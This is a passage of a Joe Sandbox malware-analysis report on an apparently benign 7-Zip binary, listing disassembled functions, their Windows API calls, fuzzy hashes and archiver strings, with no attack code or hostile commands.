Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs
String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
API String ID: 1795875747-932691680
Opcode ID: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
Instruction ID: 54b061d6d8f9ddf0e0034c00567c1b39efd6187d5e700bc974ff882f21e073e8
Opcode Fuzzy Hash: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
Instruction Fuzzy Hash: 80015E72746904DADF08EB20EC913A833A0EB96756F8054F1EA0D83674DF38C989C7C6

Function 00B5695C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32 ref: 00B5697E
RemoveDirectoryW.KERNEL32 ref: 00B569B8
free.MSVCRT ref: 00B569C8
free.MSVCRT ref: 00B569D6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: DirectoryRemovefree
String ID:
API String ID: 736856642-0
Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
Instruction ID: e93ad662b5775ac59970c5ee33d71b9e796621d669cad61f09cfbb43cd7149ec
Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
Instruction Fuzzy Hash: CDF0366730460181D9309F21D99133D63B4978A7F6F8803E1AEA9977A5DF25C94E9700

Function 00B52EF4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00B52F5B

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,00B5302B,?,?,?,?,00B53698), ref: 00B52F2C
free.MSVCRT ref: 00B52F34

Strings

Unsupported switch postfix -stm, xrefs: 00B52EF6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$freemallocmemmove
String ID: Unsupported switch postfix -stm
API String ID: 3321538808-3553869907
Opcode ID: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
Instruction ID: 925577dbe291018224d035c3b42e6a130246f1991afcdc44859f316944426779
Opcode Fuzzy Hash: 3ba05a05aa46c940f23773d9ce02a237b61b661c07e43798567cd67be696040c
Instruction Fuzzy Hash: C6F0F67670124486DF28DF4AE48036DB3A1E7857D0F14C0B0DF8907711CE39D48ACB00

Function 00B52A9C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00B52AFD

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

memmove.MSVCRT ref: 00B52ACE
free.MSVCRT ref: 00B52AD6

Strings

(LP-, xrefs: 00B52A9E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$freemallocmemmove
String ID: (LP-
API String ID: 3321538808-3833670221
Opcode ID: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
Instruction ID: 1cb8a5e20c738890aeef7fa085a63ca73fbfea53257f3f052551ca38dbc906eb
Opcode Fuzzy Hash: dee4ccff2bc834ea296647a4ce6a28e4725f2e66e5f6a145a280ef756b46b2c7
Instruction Fuzzy Hash: 64F0F07270264486DE24DF4AE88025EB3A1E7897D4F24C0B0DF8903710DA39C88ACB00

Function 00B9BF24 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9BF61
fputs.MSVCRT ref: 00B9BF71
fputs.MSVCRT ref: 00B9BF7D

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

free.MSVCRT ref: 00B9BF91

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$fputcfree
String ID:
API String ID: 3819637083-0
Opcode ID: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
Instruction ID: 9a1c6caf02a29ea37ed5b59b5066a9469ac66d5850f5c66de94b71152d4353d7
Opcode Fuzzy Hash: eae9d0b3d4822125a0af48fe465b7a3762b83d2397cc5a4e6371e8094d4e32a9
Instruction Fuzzy Hash: 08F0446230590191DA20EF26E84036A7320EB99BF5F044371EFAE437E5DF2CC5498704

Function 00B93E08 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B93E51

Part of subcall function 00B92B60: CompareFileTime.KERNEL32(?,?,?,00000000,00B93E64), ref: 00B92BA5

Strings

alternate streams, xrefs: 00B93E2D
streams, xrefs: 00B93E64
files, xrefs: 00B93E14

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CompareFileTimememmove
String ID: alternate streams$files$streams
API String ID: 1303509325-806849385
Opcode ID: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
Instruction ID: 11b37e60bf42767b3a87072172f1e8ea992f2db96e5732a6108289dd8d80ecf9
Opcode Fuzzy Hash: be883e452b7650b9078f8113c3e616bbeedde65b08412c4df6c6f1594ccd81f0
Instruction Fuzzy Hash: 9DF0C252310A6962EF60EB26D505B9863E0FB85FD4FC05062AA0C07E54AF38C39AC700

Function 00B56618 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32 ref: 00B56676

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

LocalFree.KERNEL32 ref: 00B56698

Strings

Error #, xrefs: 00B56714

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: FormatFreeLocalMessagefreememmove
String ID: Error #
API String ID: 2451246624-1299485822
Opcode ID: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
Instruction ID: e14352d01e5fa83204428a724ab48e8b6c65288f28db69533a1b3d1670c79293
Opcode Fuzzy Hash: 99fd73fc856dad1e88b4ccb444db1a8165f30a332f2d2e9cd02aa09722ea5f5f
Instruction Fuzzy Hash: AC21F13231468096DB20CF15E44079E77F1E7C9BA5F8482A6DE8987798DFB9C98CCB10

Function 00B549A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

UNC, xrefs: 00B54A59

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID: UNC
API String ID: 0-337201128
Opcode ID: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
Instruction ID: 75a130893deff02b7bbc368bda81b03db90a5aafdac0fb145de34f6ea1dd4f46
Opcode Fuzzy Hash: caa09ef79893b1e0c723e2139b0e345877b12b567cf7e66d5e2a6cc5cce0967e
Instruction Fuzzy Hash: 7121383634064586EB60CB56D48476973A0E745B9EF1490E7CF4987721EB79C8CDC705

Function 00B905F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B90661
free.MSVCRT ref: 00B90680

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Strings

ERROR: , xrefs: 00B9065A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$freememset
String ID: ERROR:
API String ID: 2276422817-977468659
Opcode ID: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
Instruction ID: bc1d4c185d9c57ed7af8adfe130845c9a9bddb084cebd0a947cae8688581f0e2
Opcode Fuzzy Hash: 0a7d431d3d93fe7a35051c5d28ee4a1495dab2c659ca31c2bdbd5e7bd3781aa1
Instruction Fuzzy Hash: D211901231260046CA25FB26E95537E73A0EB86BE1F4846F1AE6B47791DF3CC449C344

Function 00B5B45C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4AA
RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 00B5B4F8

Strings

Path64, xrefs: 00B5B45C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: QueryValue
String ID: Path64
API String ID: 3660427363-321863482
Opcode ID: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
Instruction ID: 5bd772d5722e00aa0b6d2b63271f936cc71b926d41a7ad17693179c73449c169
Opcode Fuzzy Hash: ce2d8586953f7850c663cd00a09a8bd9eb970d832503358bfea85760a13bb2cd
Instruction Fuzzy Hash: 55213A7361564087EB14CF25E454B6EB7A0F794B84F60916AEF8A47BA8DB38C885CF40

Function 00B9427C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B942DF

Strings

Can not open encrypted archive. Wrong password?, xrefs: 00B94297
Can not open the file as archive, xrefs: 00B942D8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs
String ID: Can not open encrypted archive. Wrong password?$Can not open the file as archive
API String ID: 1795875747-2399861261
Opcode ID: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
Instruction ID: b385134f7b9b5fa2d7d105411f4f563392362946e5236d1709cd42e75b468e55
Opcode Fuzzy Hash: f39ddb69ac3a88cb739d838ad3232ca34d4044717459bc95227d5b49b5a19886
Instruction Fuzzy Hash: D4018F62320645A2EE18AB26E84075A33A1FB46BD5F9890B2EE0A47355DF28C999C311

Function 00B593D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00B5941A
wcscmp.MSVCRT ref: 00B59430

Strings

\??\, xrefs: 00B593E6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: wcscmp
String ID: \??\
API String ID: 3392835482-3047946824
Opcode ID: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
Instruction ID: 88ed98e78537db7cc93848efcd7928e7cba8ece5a5bc99b2901866ef5e412f15
Opcode Fuzzy Hash: 877544d1592a68484731fd63782ff1f2adae2ffaa1fbb9196b429caabd26276c
Instruction Fuzzy Hash: 30F09661601544D2DE149B66D9D032C2361FB85B9BF9054B1CF4A87714CF24C8FFC310

Function 00B91FE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B92011

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Strings

Scan, xrefs: 00B92036
Scanning, xrefs: 00B9200A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputcfputs
String ID: Scan$Scanning
API String ID: 269475090-1436252306
Opcode ID: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
Instruction ID: e93fb32ae9c8d6cdfc91653fc527e2a0c649cb5907df6c047a534de370d30957
Opcode Fuzzy Hash: a333a3b1a96c340ffed71d634d5d0848bf1607734463fe365d44e1a31faf7854
Instruction Fuzzy Hash: F9F0E962702541A1DF15DF34C9453AC33A0EB51F88F488171CF0D4B165EF68C5CAC310

Function 00B5AFA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32 ref: 00B5AFC7
_CxxThrowException.MSVCRT ref: 00B5AFEE

Strings

out of memory, xrefs: 00B5AFD6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: out of memory
API String ID: 3773818493-2599737071
Opcode ID: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
Instruction ID: 8d6379f562e3dabd629e40575ebf1e8c9ee79b548f169ebf284278a831f1404f
Opcode Fuzzy Hash: ce28fcea7ee96d73b8b783164c7ae5dc4e7789fb7bb4cf3f4b3e7c6f29d84c20
Instruction Fuzzy Hash: E7F0A962301B8682CF04DB11EA8571CB3B0FF89B85F648060CB4C47B28EBB9C8ADC300

Function 00B9B7C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9B7E4

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Strings

Scanning the drive:, xrefs: 00B9B7DD
Scan , xrefs: 00B9B7F6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputcfputs
String ID: Scan $Scanning the drive:
API String ID: 269475090-1085461122
Opcode ID: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
Instruction ID: 0a8fd68dc59020cbd38561699c26161780a2efc2c925a99b830a6ecee3fbe679
Opcode Fuzzy Hash: a2747e59b778fe73a74f06889e3ba295ca3352f4c342e3460064b847c51e33a6
Instruction Fuzzy Hash: 18E0866530694291CE05DB29DE4536C3361EB45BE5F9855B29E0D47225EF18C9DAC300

Function 00B7EC5C Relevance: 5.3, APIs: 4, Instructions: 261COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7ECEE
free.MSVCRT ref: 00B7ECF6
free.MSVCRT ref: 00B7EFE3
free.MSVCRT ref: 00B7EFEB

Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DBC
Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DC4
Part of subcall function 00B54D78: free.MSVCRT ref: 00B54EAC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
Instruction ID: 6097ddc42563e5c73bc214f9452d5c877651251de0e9a2952e52ac5db51abf2a
Opcode Fuzzy Hash: 2568c4c8a93fed0a7db5756fe4b5abc77c557bdbfdb6e41abb2639136c3796b8
Instruction Fuzzy Hash: 20A1B032304B8196DB20DF25D48476E77A0FB88B94F1481A6DFBE4BBA5EB79C855C700

Function 00B559E0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B55ABB
free.MSVCRT ref: 00B55ACE
free.MSVCRT ref: 00B55AD6
memmove.MSVCRT ref: 00B55AEE

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
Instruction ID: a354ee4cde4f1cc7cc6ddf985098d1ab570d10625212297a9e65befa5294b84b
Opcode Fuzzy Hash: 690fc6323045f1499638e60008430e199e5b92b8d4d6359a2f546a67527e5006
Instruction Fuzzy Hash: 1641A773204E8496CB30EF22E4A525EB7A1F785FD675442D1EF5A27768DB34C85ACB00

Function 00B825DC Relevance: 5.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8279A
free.MSVCRT ref: 00B827A7
free.MSVCRT ref: 00B827B4
free.MSVCRT ref: 00B827C1
free.MSVCRT ref: 00B833CE
free.MSVCRT ref: 00B833DB
free.MSVCRT ref: 00B833E8
free.MSVCRT ref: 00B833F5
free.MSVCRT ref: 00B83430
free.MSVCRT ref: 00B8343B
free.MSVCRT ref: 00B83444
free.MSVCRT ref: 00B8344F
free.MSVCRT ref: 00B8345D
free.MSVCRT ref: 00B83484
free.MSVCRT ref: 00B8348D
free.MSVCRT ref: 00B8349B
free.MSVCRT ref: 00B834A6

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
Instruction ID: 053f7bfbec97ab3083765ba76f83992768dff761f645e14f45e91fb236e7444f
Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
Instruction Fuzzy Hash: 2D4182765096C086CA75AB62A050BEBBBF5F385784F459186DAC953B2ACE38CC44CB40

Function 00B66B58 Relevance: 5.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B66B98
free.MSVCRT ref: 00B66C80
free.MSVCRT ref: 00B66C88
free.MSVCRT ref: 00B66C9E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
Instruction ID: 943b176844853c4d5d790422ef43eaa6fd1a12002e2d66c01dd5273b3beabaf7
Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
Instruction Fuzzy Hash: 8531E973612A8086CB20DF25D5417AA37A0F7C8FE4F1842B6EE9A57794DF38C442C710

Function 00B7A034 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7A070
free.MSVCRT ref: 00B7A078
free.MSVCRT ref: 00B7A0E2
memmove.MSVCRT ref: 00B7A118

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
